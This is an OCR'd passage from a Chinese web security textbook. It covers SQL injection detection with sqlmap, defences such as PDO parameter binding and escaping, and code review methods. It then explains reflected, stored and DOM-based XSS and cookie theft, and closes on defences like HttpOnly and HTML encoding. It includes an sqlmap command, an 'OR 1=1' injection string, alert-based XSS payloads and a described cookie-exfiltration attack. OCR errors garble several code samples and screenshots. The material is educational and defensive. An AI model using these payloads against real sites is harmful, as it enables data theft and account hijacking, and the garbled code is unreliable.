发 现 注 入 点 后 怎么 去 验证 呢 ? 需要 用 到 前 面 介 绍 过 的 一 个 工具 SQLMap， 通 过 一 个 简 和 
的 命令 就 可 以 看 出 效果 : 


sqlmap.py -u "http://permeate.localhost/home/index.php?m=tiezi&a=index&bk=5" 





输入 命令 之 后 ， 按 回 车 键 ， 如 果 看 到 如 图 2-14 所 示 的 界面 ， 说 明 注入 点 是 存在 的 。 





图 2-14 发 现 注入 点 
2.1.4 ”防范 方法 


虽然 SQL 注入 漏洞 占 的 比例 非常 高 , 但 是 了 解 了 SQL 注入 方法 之 后 , 防范 起 来 并 不 复杂 
可 以 通过 一 些 合理 的 操作 和 配置 来 降低 SQL 注入 的 危险 。 


1. 结构 预 处 理 





由 于 SQL 注入 是 因为 参数 改变 了 SQL 语句 的 原 有 结构 所 造成 的 , 因此 通过 参数 绑 定 可 以 
达到 参数 是 参数 ， 结 构 是 结构 ， 从 而 避免 结构 被 改变 的 情况 。 下 面 是 PDO 参 数 绑 定 的 代码 
示例 : 

<2php 

$stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (:name, :value)"); 


$stmt->bindParam(':name', Sname); 
$stmt->bindParam(':value', $value); 


/ 插入 一 行 
$name = 'one'; 
$value = 1; 


$stmt->execute(); 
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2. 函数 转 义 
虽然 大 部 分 情况 下 都 可 以 通过 底层 DB 类 封装 好 的 方法 来 操作 数据 库 ， 比 如 常见 的 连贯 


操作 , 可 是 依然 会 有 一 部 分 操作 底层 是 很 难 满足 的 , 所 以 依然 会 存在 少 部 分 裸 写 SQL 的 情况 ， 
这 个 时 候 就 得 使 用 函数 转 义 来 保障 SQL 语句 的 结构 不 被 改变 ， 常 见 的 函数 如 下 : 


intval 

当 你 可 以 明确 参数 的 类 型 时 ， 可 以 使 用 intval 把 接收 的 参数 转换 一 下 类 型 ， 防 止 参数 中 
出 现 一 些 非 法 的 SQL 语句 。 比 如 我 们 要 接收 一 个 商品 ID ， 可 以 使 用 $productId = 
intval($_GET['product id]); 。 


addslashes 
addslashes 可 以 通过 反 斜 杠 转 义 所 有 的 单 引号 、 双 引号 、 反 斜 杜 ， 试 想 一 下 ，SQL 语 句 
如 下 : 


<?Php 
$id = addslashes($id);$sql = "SELECT * FROM user WHERE id = '$id"; 


如 果 攻 击 者 在 这 里 把 参数 id 故意 提交 为 1 OR '1 = 1"， 服 务 器 会 产生 SQL 注入 问题 吗 ? 答 
案 是 不 会 ， 因 为 通过 addslashes 函 数 已 经 把 “'” 转 为 了 “\”， 所 以 可 以 避免 SQL 注入 。 但 是 
前 提 条 件 是 PHP 请 求 数据 库 时 的 字符 集 为 UTF-8， 和 否则 GBK 依 然 会 存在 注入 的 可 能 性 ， 再 次 
建议 大 家 把 代码 和 数据 库 都 设置 为 UTF-8 编 码 。 





mysql_real escape string 

mysql_real_escape_string 转 义 函 数 与 addslashes 大 体 来 说 是 类 似 的 ， 不 过 也 有 一 些小 区 
别 ， 主 要 有 两 点 : 

第 一 点 是 addslashes 不 关心 MySQL 连 接 的 字符 集 是 什么 ， 都 会 进行 转 义 ， 而 
mysql_real_escape_string 会 根据 MySQL 的 字符 集 做 出 相应 处 理 。 

第 二 点 是 mysql_real_escape_string 必 须 先 连接 上 数据 库 才 可 以 使 用 该 函数 做 转 义 。 另 外 ， 
mysql_real_escape_string 对 PHP 版 本 还 有 一 些 要 求 , 所 以 在 很 多 开源 的 CMS 系 统 中 , addslashes 
相对 来 说 用 得 更 为 广泛 。 

可 以 通过 下 面 的 代码 得 出 结论 : 

<2php 

echo mysql_real_ escape string("fdsafda'fdsa"); 

访问 后 的 结果 出 现 错误 信息 ,并 提示 连接 数据 库 的 用 户 名 及 密码 错误 , 因为 此 函数 需要 

连接 数据 库 ， 而 代码 中 并 没有 连接 ， 因 此 出 现 如 图 2-15 所 示 的 错误 。 
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0.0010 235144| {main} ( ) | \222. php:0 





2| 0.0015 235272|mwsal real escape string () |... \222. php:2 





图 2-15 访问 结果 出 现 错误 信息 

其 他 类 似 的 编码 转换 方法 还 有 很 多 ， 这 里 就 不 一 一 举例 了 。 

3. 参数 规则 验证 

主要 通过 以 下 3 点 来 验证 。 

一 是 检查 用 户 输入 的 合法 性 , 确认 输入 的 内 容 只 包含 合法 的 数据 。 数 据 检查 需要 两 端 全 
部 检查 ， 客 户 端 检查 后 ， 服 务 器 端 还 需要 执行 一 次 检查 ， 之 所 以 还 需要 执行 服务 器 端 验 证 ， 
是 为 了 弥补 客户 端 验 证 机 制 脆弱 的 安全 性 。 

二 是 限制 表单 或 查询 字符 串 输入 的 长 度 。 如 果 用 户 的 登录 名 字 最 多 只 有 10 个 字符 , 那么 
不 要 认可 表单 中 输入 的 10 个 以 上 的 字符 ,这 将 大 大 增加 攻击 者 在 SQL 命令 中 插入 有 害 代码 的 
难度 。 

三 是 检查 提取 数据 的 查询 所 返回 的 记录 数量 。 如 果 程序 只 要 求 返回 一 个 记录 , 但 实际 返 
回 的 记录 却 超过 一 行 ， 那 就 当 作出 错 处 理 。 

4. 屏蔽 错误 消息 

防范 SQL 注入 还 要 避免 出 现 一 些 详细 的 错误 消息 ， 因 为 攻击 者 可 以 利用 这 些 消息 。 要 使 


用 一 种 标准 的 输入 确认 机 制 来 验证 所 有 输入 数据 的 长 度 、 类 型 、 语 句 、 企 业 规 则 等 ， 例 如 下 
述 命令 : 


<?php @S$conn = mysql_connect("localhost", "root", "") or die("error connecting"); 
连接 数据 库 的 时 候 可 以 在 行 首 加 上 一 个 @ 符 号 ， 就 可 以 屏蔽 错误 信息 输出 。 
5. 权限 控制 


对 于 用 来 执行 查询 的 数据 库 账 户 ， 限 制 其 权限 。 用 不 同 的 用 户 账户 执行 查询 、 插 入 、 更 
新 、 删 除 操作 ， 由 于 隔离 了 不 同 账户 可 执行 的 操作 ， 因 此 就 防止 了 原本 用 于 执行 SELECT 命 
令 的 地 方 却 被 用 于 执行 INSERT、UPDATE 或 DELETE 命 令 。 


2.1.5 “代码 审查 
对 于 代码 改动 的 上 线 ， 大 部 分 团队 会 有 一 个 code review 的 过 程 ， 如 何在 review code 时 检 
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查 SQL 注 入 漏洞 ， 从 而 避免 漏洞 问题 的 产生 呢 ? 通常 审计 代码 有 两 种 比较 常见 的 方法 : 参数 
检查 法 和 反 向 推理 法 。 

1. 参数 检查 法 

代码 通常 是 由 MVC 模 式 所 开发 的 ， 所 以 可 以 从 查找 接收 参数 的 控制 器 层 入 手 。 

在 接收 参数 中 ， 比 较 常见 的 会 用 到 $_POST、$_GET、$COOKIE、$_REQUEST 等 ,可 
以 通过 参数 的 名 称 或 者 接收 参数 的 变量 名 大 致 分 析 该 参数 是 否 是 数字 ， 比 如 $orderld = 
$_GET['orderid']; 。 

这 种 情况 基本 可 以 猜测 出 是 数字 型 参数 ， 如 果 是 数字 型 参数 而 没有 使 用 intval 函 数 过 
滤 ， 就 需要 接着 执行 逻辑 检测 。 比 如 该 参数 是 否 传递 给 了 DB 类 ， 如 果 是 ，DB 类 通常 已 经 做 
了 PDO 预 处 理 ， 这 种 一 般 是 没有 注入 点 的 。 

检查 该 参数 是 否 放 入 了 裸 写 的 SQL 语句 中 ,如 果 是 ， 就 需要 确认 该 参数 是 否 做 了 查询 预 
处 理 ， 如 果 没 有 过 滤 也 没有 做 查询 预 处 理 ， 基 本 可 以 确定 存在 SQL 注入 点 。 

除了 数字 参数 外 , 还 有 字符 串 参 数 ， 字 符 串 参数 检测 方式 与 数字 型 参数 稍 有 不 同 。 字 符 
串 型 参数 不 能 通过 intval 方 法 过 滤 来 保证 其 安全 性 , 而 是 需要 查看 该 参数 在 生成 SQL 的 时 候 是 
否 做 了 数据 绑 定 的 操作 。 

2. 反 向 推理 法 

开发 者 都 知道 业务 和 数据 库 交 互 最 多 的 SQL 结构 是 CURD ， 分 别 代 表 INSERT、 
UPDATE、SELECT、DELETE， 因 此 在 代码 审计 时 ， 根 据 这 个 特性 ， 可 以 利用 一 些 编辑 器 
在 文件 中 查找 关键 词 ， 比 如 搜索 INSERT 来 找到 哪些 位 置 裸 写 了 SQL。 如 果 有 裸 写 SQL 的 情 
况 ， 再 判断 SQL 执行 时 是 否 使 用 了 数据 绑 定 预 处 理 方法 ， 如 果 也 没有 预 处 理 ， 再 看 一 下 SQL 
语句 中 的 参数 是 否 过 滤 、 是 否 可 以 被 用 户 所 利用 。 

3. 宽 字 节 审计 

我 们 知道 , 漏洞 的 类 型 有 常规 注入 、 宽 字 节 注入 、URL 二 次 编码 注入 ， 所 以 在 审查 代码 
的 时 候 还 需要 留意 一 下 宽 字 节 问 题 ， 针 对 宽 字 节 代 码 审 计 也 有 一 些 方法 。 

通过 前 面 的 宽 字 节 内 容 知 道 ， 宽 字 节 是 因为 在 连接 数据 库 的 时 候 使 用 了 
character_ set_client=gbk 方 法 或 类 似 的 方法 ,所 以 在 审计 的 时 候 ， 可 以 通过 搜索 几 个 关键 词 来 
判断 是 否 存 在 宽 字 节 注入 问题 : 

(1) character set_client=gbk 
(2) SET NAMES 'gbk' 











(3) mysql set_charset('gbk') 
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URL 二 次 编码 注入 可 以 通过 下 面 两 个 关键 词 做 出 判断 : 


(1) urldecode 


(2) rawurldecode 


如 果 没 有 这 两 个 关键 词 ， 就 不 存在 URL 二 次 编码 漏洞 问题 。 


2.1.6 小结 


SQL 注入 是 Web 安 全 中 最 容易 出 现 的 漏洞 之 一 ， 在 历年 的 漏洞 报告 中 占 比 达到 30% 左 
右 。 虽 然 是 最 容易 出 现 的 漏洞 ， 但 是 只 要 重视 起 来 ， 防 范 并 不 难 。 








http://www.daxia,xxx/search?keyword=test</div><script>alert(123)</script> ( 





<html> 


<head> 





</html> 





<title> 搜 索 结 果 页 </title> 
</head> 
<body> 


I 


est</div><script>alert(123)</script>) 滨 果 如 下 </div> 


黑客 








XSS 又 叫 跨 站 脚本 攻 寺 





生 《Cross Site Script，CSS) ， 为 不 和 层 登 样式 表 (Cascading Style 


Sheets，CSS) 的 缩写 混淆 ， 故 将 跨 站 脚本 攻击 缩写 为 XSS。 它 指 的 是 攻击 者 往 Web 页 面 里 插 
入 恶意 HTML 代 码 ， 当 用 户 浏览 该 页 时 ， 媒 入 Web 里 面 的 HTML 代 码 会 被 执行 ， 从 而 达到 恶 


意 的 目的 。 





XSS 攻 击 利用 网 站 的 漏洞 从 用 户 那 是 


有 恶意 盗 取 信息 。 用 户 在 浏览 网 站 、 使 用 即时 通信 软 





件 ， 甚 至 在 阅读 电子 邮件 时 ， 通 常会 单 击 其 中 的 链接 。 攻 击 者 通过 在 链接 中 插入 恶意 代码 就 


能 够 盗 取 用 户 信息 。 


攻击 者 通常 会 用 十 六 进 制 (或 其 他 编码 方式 ) 对 链接 进行 编码 ， 以 免 用 户 怀疑 它 的 合法 
性 。 网 站 在 接收 到 包含 恶意 代码 的 请 求 之 后 会 产生 一 个 包含 恶意 代码 的 页 面 , 而 这 个 页 面 看 
起 来 就 像 是 那个 网 站 应 当 生 成 的 合法 页 面 一 样 。 

一 些 论坛 网 站 或 者 一 些 商城 网 站 通常 允许 用 户 发 表 包 含 HTML 和 JavaScript 的 帖子 或 评 
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论 , 假设 用 户 张 三 发 表 了 一 篇 包含 恶意 脚本 的 帖子 ,那么 用 户 李 四 在 浏览 这 篇 帖子 时 ， 恶 意 
脚本 就 会 执行 ， 盗 取 用 户 李 四 的 Session 信 息 。 

这 里 用 一 个 HTML 代 码 的 例子 来 说 明 一 下 XSS 的 原理 。“<font size=2>daxia</font>” 是 
一 段 简单 的 HTML 的 代码 ， 这 段 代码 的 意思 是 设置 字体 大 小 为 “2”， 假 设 一 个 论坛 的 用 户 
想 发 表 这 段 代 码 给 其 他 用 户 看 ， 但 是 浏览 器 认为 这 是 一 段 HTML 代 码 ， 于 是 将 它 作 为 HTML 
代码 执行 ， 这 时 其 他 用 户 看 到 的 并 不 是 原文 “ <font size=2>daxia</font>”， 而 是 变 成 了 2 号 
字体 的 “daxia”。 也 就 是 说 ， 这 段 代码 被 浏览 器 解析 成 了 HTML 语言， 而 不 是 文本 内 容 。 

造成 XSS 漏 洞 的 原因 是 攻击 者 输入 的 参数 没有 经 过 严格 的 控制 , 最 终 把 参数 显示 给 来 访 
间 的 用 户 , 攻击 者 通过 巧妙 的 方法 注入 恶意 指令 代码 到 网 页 ， 使 用 户 加 载 并 执行 攻击 者 恶意 
制造 的 网 页 程序 。 这 些 恶 意 网 页 程序 通常 是 JavaScript， 甚 至 是 普通 的 HTML 。 攻 击 成 功 后 ， 
攻击 者 可 能 得 到 个 人 网 页 内 容 、 会 话 和 Cookie 等 各 种 内 容 。 


2.2.1 XSS 漏洞 类 型 


XSS 虽 然 都 是 因为 攻击 者 通过 让 浏览 器 执行 了 攻击 者 的 代码 所 造成 的 ， 但 是 却 分 为 3 种 
类 型 ， 不 同类 型 之 间 的 危害 性 以 及 攻击 方法 也 不 一 样 。 下 面 将 介绍 3 种 XSS 的 类 型 ， 包 括 反 
射 型 、 存 储 型 和 DOM 型 。 


1. 反射 型 


反射 型 XSS 就 是 攻击 者 给 受害 者 发 送 带 有 恶意 脚本 代码 的 URL, 当 URL 地 址 被 受害 者 打 
开 时 ， 攻 击 者 的 代码 会 被 作为 HTML 解 析 并 执行 ， 此 时 攻击 者 就 可 以 获取 用 户 的 Cookie， 进 
而 盗号 登录 。 比 如 ， 攻 击 者 张 三 构 造 好 修改 密码 的 URL 并 把 密码 修改 成 123， 但 是 密码 只 有 
登录 方 李 四 才能 修改 , 李 四 在 登录 的 情况 下 单 击 张 三 构 造 好 的 URL, 将 直接 在 不 知情 的 情况 
下 修改 密码 。 

反射 型 XSS 脚 本 攻击 就 如 上 面 所 提 到 的 XSS 跨 站 脚本 攻击 方式 ， 其 特点 是 非 持久 化 ， 必 
须 用 户 单 击 带 有 特定 参数 的 链接 才能 引起 。 该 类 型 将 用 户 输入 的 数据 未 经 安全 过 滤 就 在 浏览 
器 中 进行 输出 ， 导 致 输出 的 数据 中 存在 可 被 浏览 器 执行 的 代码 数据 。 

由 于 反射 型 XSS 的 跨 站 代码 存在 于 URL 中 , 因此 攻击 者 通常 需要 通过 诱骗 或 加 密 变 形 等 
方式 将 存在 恶意 代码 的 链接 发 给 用 户 ， 只 有 用 户 单 击 以 后 才能 使 得 攻击 成 功 实施 。 

反射 型 XSS 案例 

反射 型 XSS 漏 洞 是 通过 URL 传 播 的 ， 因 此 在 参数 中 就 可 以 看 到 其 攻击 代码 ， 如 图 2-16 
所 示 。 

在 图 2-16 中 可 以 看 到 ，URL 中 的 JavaScript 代 码 被 浏览 器 在 页 面 中 执行 了 ,而 攻击 者 要 想 
让 受害 者 执行 ， 必 须 通过 某 种 方式 将 URL 发送 给 受害 者 。 
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XSS 跨 站 脚本 >> 反射 性 XSS 


What is your name ? 


zhangsan 





图 2-16 在 参数 中 可 以 看 到 其 攻击 代码 


2. 存储 型 


存储 型 XSS 通 常 是 指 Web 应 用 程序 会 将 用 户 输入 的 数据 保存 在 服务 端的 数据 库 中 ， 网 页 
进行 数据 查询 展示 时 ， 会 从 数据 库 中 获取 数据 内 容 ， 并 将 数据 内 容 在 网 页 中 输出 展示 ， 因 此 
存储 型 XSS 具 有 较 强 的 稳定 性 。 存 储 型 XSS 脚 本 攻击 最 为 常见 的 场景 是 在 博客 或 新 闻 发 布 系 
统 中 ,攻击 者 将 包含 有 恶意 代码 的 数据 信息 直接 写 入 文章 或 文章 评论 中 ,所 有 浏览 文章 或 评 
论 的 用 户 都 会 在 他 们 的 客户 端 浏览 器 环境 中 执行 插入 的 恶意 代码 。 

存储 型 XSS 的 特点 是 你 打开 了 一 个 正常 的 URL， 也 有 可 能 触发 XSS 攻 击 ， 假 设 你 打开 了 
一 篇 正常 的 文章 页 面 ， 下 面 有 评论 功能 ， 这 个 时 候 你 去 评论 了 一 下 , 在 文本 框 中 输入 了 一 些 
JavaScript 代 码 , 提交 并 刷新 这 个 页 面 后 ,发现 刚刚 提交 的 代码 又 被 原封 不 动 地 返回 并 且 执行 
了 ， 这 就 说 明 此 位 置 存在 XSS 漏 洞 。 

如 果 攻 击 者 写 一 段 JavaScript 代 码 获取 Cookie 信 息 , 然后 通过 Ajax 发 送 到 攻击 者 自己 的 服 
务 器 ,构造 好 代码 后 ， 把 链接 发 给 其 他 受害 者 或 者 网 站 管理 员 ， 因 为 在 URL 上 并 没有 看 出 有 
异常 的 脚本 代码 ， 看 起 来 是 一 个 很 正常 的 URL， 所 以 防范 心 通常 是 比较 低 的 。 当 受 害 者 打开 
页 面 时 ，JavaScript 代 码 就 会 被 执行 ， 攻 击 者 服务 器 就 会 接收 到 受害 者 的 Cookie 信 息 ， 拿 到 
Cookie 信 息 也 就 代表 着 攻击 者 可 以 冒充 受害 者 来 执行 某 些 操作 。 

存储 型 XSS 案例 

2015 年 7 月 ， 白 帽子 “路 飞 ” 提 交 了 一 个 旅游 资讯 站 的 存储 型 XSS 漏洞 。 

参考 链接 : wooyun-2015-0125219。 


当 用 户 打开 链接 : http://lvyou.localhost.com/qingchengshan/remark 时 ， 就 会 触发 攻击 者 
在 评论 区 域 的 XSS 代码 ， 如 图 2-17 所 示 。 
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hyou.baiducom 


| 首页 ”目的 池 攻 略 5 





肯 度 旅游 > 目的 地 指南 > 亚洲 > 中 国 > 四 川 > 成 者 


大 条 印象 = 站 了 9 可 林 。 青 城 天 下 出 名 不 庶 传 ， 真 的 搁 
大 。 但 是 i 
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3 I5c590aa 23266 5 大 怕 小 天 使 
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a 人 所 襄 周 Je 划 明 | 
oooo0 : 才 点 评 雪 238/] 
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图 2-17 评论 区 的 恶意 代码 被 执行 成 功 


从 图 2-17 可 以 看 出 ， 有 一 段 Cookie 信息 被 浏览 器 弹出 来 了 ， 说 明白 帽子 的 测试 代码 被 
浏览 器 执行 了 ， 也 就 说 明 此 处 存在 XSS 漏洞 。 

3. DOM 型 

DOM 型 XSS 跨 站 脚本 攻击 是 指 通过 修改 页 面 DOM 节 点 数据 信息 而 形成 的 XSS 跨 站 脚本 
攻击 。 不 同 于 反射 型 XSS 和 存储 型 XSS，DOM 型 的 XSS 跨 站 脚本 攻击 需要 针对 具体 的 
JavaScript DOM 代 码 进行 分 析 ， 根 据 实际 情况 进行 防范 。 下 面 针 对 有 具体 代码 进行 详细 分 析 。 

DOM 型 XSS 是 JavaScript 操 作 页 面 的 DOM 元 素 所 造成 的 XSS 漏 洞 ， 如 图 2-18 所 示 ， 在 代 
码 中 可 以 看 到 虽然 经 过 HTML 转 义 了 ， 但 是 这 块 代码 在 返回 到 HTML 中 时 ， 又 被 JavaScript 
作为 DOM 元 素 操作 。 











<?php 
error_reporting (0); 
Sname = htmlspecialchars Ee ["name"])i| 


?> 
<input id=-"username" type-"text" value-"<?php echo $name;?>" /> 
<div id="content"></div> 


<script type="text/javascript"> 

// 获取 输入 的 名 称 ， 并 且 输 出 在 content 内 。 导 致 了 一 
var Username = document .getElementBYId( 
var content = document .getElementById(" 
content .innerHTML = username.value; 
</script> 


人 xss- 











图 2-18 DOM 型 XSS 代码 示例 


此 时 ， 当 用 户 通过 浏览 器 访问 的 URL 里 面包 含 ?name=<img src=1 onerror=alert(1)> 时 ， 
依然 会 触发 恶意 的 代码 ， 如 图 2-19 所 示 。 
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discuzlocalhosttestphp?name= x 





x X 合 次 discuzlocalhosttestphp?name=<img src=1 onerror=alert(1)> 


<img src=1 onerror=alert( 
[可 discuz.localhost 显示 : 
1 


休止 此 页 再 旦 示 对 话 框 . 








图 2-19 转 义 后 的 代码 仍然 被 执行 


DOM 型 XSS 需 要 从 后 端 语言 和 前 端 语 言 一 起 来 防范 ， 因 此 在 进行 DOM 操 作 的 时 候 ， 一 
定 要 考虑 此 参数 攻击 者 是 否 可 以 控制 。 


2.2.2 ”漏洞 危害 
1. Cookies 资 取 


XSS 跨 站 漏洞 不 仅仅 是 弹 框 ， 而 且 可 以 盗 取 用 户 的 Cookies。 讲 到 Cookies， 这 里 就 要 复 
习 一 下 Cookies 的 一 些 常识 。 举 例 说 明 : 登录 dixcuz 论 坛 的 时 候 ， 记 住 密码 后 ， 下 次 登录 的 时 
候 就 不 需要 再 输入 账号 和 密码 了 ， 这 是 因为 浏览 器 读 取 了 计算 机 上 的 Cookies 文 件 ， 验 证 了 
账号 和 密码 ， 所 以 无 须 再 输入 密码 。 

这 种 Cookies 是 保存 在 硬盘 中 的 ， 还 有 一 种 应 该 保存 在 内 存 中 ， 假 设 登录 了 论坛 ， 然 后 
在 QQ 群 里 面 看 到 了 一 个 地 址 ， 是 论坛 中 某 个 帖子 的 地 址 ， 在 浏览 器 中 打开 该 地 址 ， 在 新 打 
开 的 页 面 中 会 发 现 已 经 登录 了 账号 。 

但 是 一 旦 关闭 浏览 器 ， 再 次 打开 该 网 址 ,就 会 提示 需要 输入 账号 和 密码 来 登录 。 一 开始 
不 需要 输入 账号 和 密码 是 因为 读 取 了 内 存 中 的 Cookies， 已 经 验证 你 的 身份 。 而 后 面 因 为 关 
闭 了 浏览 器 ，Cookies 也 会 被 销毁 ， 再 次 打开 该 地 址 时 ， 已 经 无 法 获取 到 之 前 的 Cookies 了 ， 

现在 知道 用 户 的 登录 保存 其 实 是 因为 有 Cookies 的 原因 , 同样 攻击 者 在 拿 到 Cookies 之 后 ， 
也 可 以 将 自己 浏览 器 的 Cookies 值 修改 为 受害 者 的 Cookies， 来 冒充 受害 者 。 如 图 2-20 所 示 为 
使 用 浏览 器 插件 修改 当前 页 面 的 Cookies 值 。 
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» wooyun.org | UM_distinctid 





™ wwwwooyun.org | Hm _Ivt_24b7d5cc1b26f24f256b6869b069278e 


值 
1508582959 





© 


域名 


路 径 


过 kj 间 
21/10/2018 06:49 PM 


hostOnly 


» www.wooyun.org | CNZZDATA1261218610 





图 2-20 浏览 器 插件 可 以 修改 Cookies 信息 
可 以 看 到 ，Cookies 信 息 是 可 以 通过 浏览 器 插件 进行 修改 的 。 
2. Cookies 盗 取 


举例 说 明 : 攻击 者 知道 某 个 论坛 存在 XSS 跨 站 漏洞 ， 此 时 攻击 者 在 论坛 中 发 了 一 个 带 有 
恶意 代码 的 帖子 , 当 管 理 员 浏 览 到 这 个 页 面 的 时 候 , 浏览 器 便 执行 了 攻击 者 所 发 表 的 JS 代码 ， 
管理 员 的 Cookies 马 上 就 会 被 攻击 者 盗 取 ， 攻 击 者 收取 之 后 登录 网 站 的 后 台 ， 然 后 将 Cookies 
修改 为 盗 取 的 管理 员 的 Cookies， 再 次 刷新 页 面 会 发 现 居 然 进去 了 后 台 。 这 是 因为 网 站 验证 
了 用 户 的 Cookies 是 管理 员 的 ， 所 以 允许 进入 后 台 操作 。 

在 XSS 跨 站 平台 中 设置 攻击 者 用 于 接收 Cookies 的 邮箱 地 址 ， 然 后 生成 一 段 脚本 代码 ， 
这 段 代 码 的 含义 是 : 无 形 中 悄悄 地 输出 用 户 的 Cookies 到 某 个 文件 中 ， 然 后 读 取 该 文件 中 的 
Cookies 信 息 ， 发 送 到 指定 的 邮箱 中 。 试 着 想 一 想 ， 发 表 在 某 个 留言 板 中 ， 当 管理 员 看 到 了 ， 
那么 管理 员 的 Cookies 就 被 盗 取 了 ， 攻 击 者 再 进入 后 台 修 改 Cookies， 浏 览 器 验证 Cookies 信 息 
为 管理 员 的 ， 就 无 须 输入 账号 和 密码 ， 可 以 直接 进入 后 台 。 


Cookie 盗 取 案例 


2015 年 8 月 ， 白 帽子 “Interface” 提 交 了 一 个 XSS 盲 打 进 后 台 的 漏洞 。 

缺陷 编号 : wooyun-2015-0135859。 

白 帽 子 在 此 系统 的 App 中 下 了 一 个 订单 ， 订 单 信息 中 填写 了 一 些 恶意 代码 ， 之 后 单 击 
提交 订单 ， 在 订单 列表 中 可 以 看 到 XSS 代码 ， 如 图 2-21 所 示 。 
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删除 


历史 记录 


图 test"><script src=http:. 
图 test"><script src=http-. 
出 发 时 间 : 2015-08-21 18:22 


已 加 或 全 名 





图 2-21 订单 列表 的 XSS 代码 
白 帽子 下 午 发 现 自己 的 服务 器 已 经 收 到 了 受害 者 的 一 些 信 息 ， 包 含 Cookie， 如 图 2-22 所 示 。 





-折合 。 2015-08-21 e location : http/bsboss MSN mma 页 PP_REFERER :http/bsboss.pig84c 出 险 
14:06:34 eredLine/getCh a re wm charteredLine/getChertanet et 

?bc_line_id=150000 E9322 ail.action?bc_line BT EEE 3 

® toplocation : http:/bsbossmam pom/o 1322 
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® cookie : JSESSIONID=7962BI2206707 patible; MSIE 8.0; WRENNT 5.1; Trid 
5D648288m== ne enti4.0; InfoPath 2) 

® opener: ® REMOTE_ADDR 

5.252.90 














图 2-22 白 帽子 收 到 的 cookie 信息 
通过 这 些 信息 伪造 Cookie 成 功 登 录 到 平台 的 管理 后 合 中 ， 如 图 2-23 所 示 。 


#7T-w-@- 侣 加 








NE 人 





Wa Fe | 
所 有 香客 





oo 









Me 


T 394508.21 性 1320 700 oo a a Sm 天 无 下 Es i 


a 20tE0021141253 


0 20150821141050 Ha5757 QR a 妆 Ta 天 天 天 本 HE 





图 2-23 白 帽 子 成 功 登 录 后 台 
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3. 降低 XSS 的 危害 


通过 以 上 针对 不 同情 况 的 XSS 跨 站 脚本 攻击 的 描述 ， 了 人 解 到 在 复杂 的 Web 环 境 中 ，XSS 
的 利用 是 千变万化 的 ， 如 何 能 够 有 效 地 防范 XSS 跨 站 脚本 攻击 问题 一 直 是 浏览 器 厂商 和 网 站 
安全 技术 人 员 关 注 的 热门 话题 。 

现在 很 多 浏览 器 厂商 都 在 自己 的 程序 中 增加 了 防范 XSS 跨 站 脚本 攻击 的 措施 ， 如 IE 浏 览 
器 从 IE8 开 始 内 置 了 XSS 得 选 器 ，Firefox 也 有 相应 的 CSP、Noscript 扩 展 等 。 而 对 于 网 站 的 安 
全 技术 人 员 来 说 ， 提 出 高 效 的 技术 解决 方案 ， 保 护 用 户 免 受 XSS 跨 站 脚本 攻击 才 是 关键 。 

下 面 结合 网 站 安全 设计 描述 一 下 如 何 通过 技术 手段 实现 XSS 跨 站 脚本 攻击 的 防范 。 


4. 利用 HttpOnly 


HttpOnly 最 初 是 由 微软 提出 的 ， 目 前 已 经 被 多 款 流行 浏览 器 厂商 所 采用 。HttpOnly 的 作 
用 不 是 过 滤 XSS 跨 站 脚本 攻击 ， 而 是 浏览 器 将 禁止 页 面 的 JavaScript 访 问 带 有 HttpOnly 属 性 的 
Cookie， 解 决 XSS 跨 站 脚本 攻击 后 的 Cookie 会 话 劫持 行为 。 

HttpOnly 是 在 SetCookie 时 进行 标记 的 ， 设 置 的 Cookie 头 格式 如 下 : 

Set-Cookie: <name>=<value> 

[; <name>=<value>] 

[; expires=<date>] 

[; domain=<domain_name>] 

[; path=<some_path>] 

[; secure] 

[; HttpOnly] 

以 PHP 为 例 , 在 PHP 5.2 版 本 时 就 已 经 在 setcookie 函 数 中 加 入 了 对 HttpOnly 的 支持 , 例如 : 

<?php 

setcookie("username", "zhangsan", NULL, NULL,NULL, NULL, TRUE); 

通过 以 上 代码 就 可 以 设置 user 这 个 Cookie， 将 其 设置 为 HttpOnly，setcookie 函 数 实质 上 
是 通过 向 客户 端 发 送 原始 的 HTTP 报 文 头 进行 设置 的 ，document 将 不 可 见 这 个 Cookie， 所 以 
使 用 document.cookie 就 取 不 到 这 个 Cookie， 也 就 实现 了 对 Cookie 的 保护 。 


2.2.3 ”防范 方法 

XSS 跨 站 脚本 攻击 作为 Web 应 用 安全 领域 中 最 大 的 威胁 之 一 ， 不 仅 危 害 Web 应 用 业务 的 
正常 运营 ,对 访问 Web 应 用 业务 的 客户 端 环 境 和 用 户 也 带 来 了 直接 的 安全 影响 。 但 是 如 果 开 
发 者 能 够 对 Web 应 用 的 各 种 环境 进行 详细 分 析 和 处 理 ， 完 全 阻 断 XSS 跨 站 脚本 攻击 还 是 可 以 
实现 的 。 
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由 于 3 种 XSS 跨 站 脚本 攻击 类 型 的 漏洞 成 因 可 不 相同 ， 针 对 输入 输出 的 检查 一 部 分 适用 
于 反射 型 XSS 与 存储 型 XSS， 而 另 一 些 检 查 适用 于 基于 DOM 的 XSS。 


1. 常规 处 理 


输入 检查 在 大 多 数 情 况 下 都 是 对 可 信 字 符 的 检查 或 输入 数据 格式 的 检查 , 如 用 户 输 入 的 
注册 账号 信息 中 只 允许 包括 字母 、 数 字 、 下 划 线 和 汉字 等 ， 对 于 输入 的 一 切 非 白 名 单 内 的 字 
符 均 认为 是 非法 输入 。 数 据 格式 (如 输入 的 人 P 地 址 、 电 话 号 码 、 邮 件 地址 、 日 期 等 数据 》 都 
具有 一 定 的 格式 规范 ， 只 有 符合 数据 规范 的 输入 信息 才 人 允许 通过 检查 。 

同时 ,要 阻止 攻击 者 在 网 站 上 发 布 XSS 攻 击 代 码 ， 因 此 我 们 不 可 以 信任 用 户 提 交 的 任何 
内 容 ， 首 先 代码 里 对 用 户 输入 的 地 方 和 变量 都 需要 仔细 检查 长 度 ,并 对 “<”“>”“;”“?”” 
等 字符 进行 过 滤 ; 其 次 ， 任 何 内 容 写 到 页 面 之 前 都 必须 加 以 htmlspecialchars， 避 免 不 小 心 直 
接 输出 HTML 标 签 。 

另外 , 在 输出 检查 时 , 主要 是 针对 展示 的 数据 进行 HTML 编 码 处 理 , 将 可 能 存在 导致 XSS 
跨 站 脚本 攻击 的 恶意 字符 进行 编码 ， 在 不 影响 正常 数据 显示 的 前 提 条 件 下 ， 过 滤 恶 意 字符 。 
常见 的 可 能 造成 XSS 跨 站 脚本 攻击 的 字符 及 其 HTML 编 码 如 下 : 

"&quot; 

‘Qapos; 

&&amp; 

<&lt; 

> &et; 














辣 





2. DOM 型 XSS 


